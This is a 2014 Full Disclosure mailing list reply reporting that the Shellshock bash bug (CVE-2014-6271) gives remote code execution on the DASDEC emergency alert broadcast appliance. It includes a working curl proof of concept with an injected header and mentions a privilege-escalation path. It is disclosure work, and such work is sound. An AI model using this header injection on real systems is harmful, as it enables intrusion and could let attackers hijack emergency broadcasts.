Full Disclosure mailing list archives
Re: Critical bash vulnerability CVE-2014-6271
From: Matt Hazinski <mhazinsk () vt edu>
Date: Fri, 26 Sep 2014 14:02:51 -0400
On Thu, Sep 25, 2014 at 02:39:55PM +0200, Philip Cheong wrote:
Worse that heartbleed? http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271 http://arstechnica.com/security/2014/09/bug-in-bash-shell-creates-big-security-hole-on-anything-with-nix-in-it/
I'm able to get remote code execution via CVE-2014-6271 on the Digital Alert Systems DASDEC. This appliance is used by broadcasters to send and receive Emergency Alert System messages over IP and AFSK. Once authenticated, an attacker can interrupt broadcasts (via a relay) and play arbitrary audio over the airwaves.
Exploiting it only requires a malicious HTTP header:curl -H 'X-Shell-Shock: () { :; }; /bin/echo vulnerable > /tmp/dumped_file'
http://192.168.0.45/dasdec/dasdec.csp[matt@WUVT-EAS ~]# cat /tmp/dumped_file vulnerable
Commands are executed as the apache user, but privilege escalation can still be obtained through CVE-2009-2692 despite the vendor's recent cumulative security patch.
I suspect all versions of the DASDEC are vulnerable to this, although I only have a DASDEC-1EN running software version 2.0-2 to test.
-- Matt Hazinski mhazinsk () vt edu _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- Critical bash vulnerability CVE-2014-6271 Philip Cheong (Sep 25)
- Re: Critical bash vulnerability CVE-2014-6271 Michal Zalewski (Sep 25)
- Re: Critical bash vulnerability CVE-2014-6271 Tony Arcieri (Sep 25)
- Re: Critical bash vulnerability CVE-2014-6271 (slightly OT logo discussion) Ben Lincoln (F7EFC8C9 - FD) (Sep 26)
- Re: Critical bash vulnerability CVE-2014-6271 Matt Hazinski (Sep 26)
- Re: Critical bash vulnerability CVE-2014-6271 Tony Arcieri (Sep 25)
- Re: Critical bash vulnerability CVE-2014-6271 Michal Zalewski (Sep 25)
- Re: Critical bash vulnerability CVE-2014-6271 Paul Vixie (Sep 25)
- Re: Critical bash vulnerability CVE-2014-6271 Yvan Janssens (Sep 25)
- Re: Critical bash vulnerability CVE-2014-6271 g () 1337 io (Sep 25)
- Re: Critical bash vulnerability CVE-2014-6271 Evan Teitelman (Sep 25)
- Re: Critical bash vulnerability CVE-2014-6271 Godin, Erik (Sep 25)
- Re: Critical bash vulnerability CVE-2014-6271 Tim (Sep 25)
- Re: Critical bash vulnerability CVE-2014-6271 Paul Vixie (Sep 25)
- Re: Critical bash vulnerability CVE-2014-6271 Seth Arnold (Sep 25)
- Re: Critical bash vulnerability CVE-2014-6271 Paul Vixie (Sep 25)
- Message not available
- Re: Critical bash vulnerability CVE-2014-6271 Paul Vixie (Sep 25)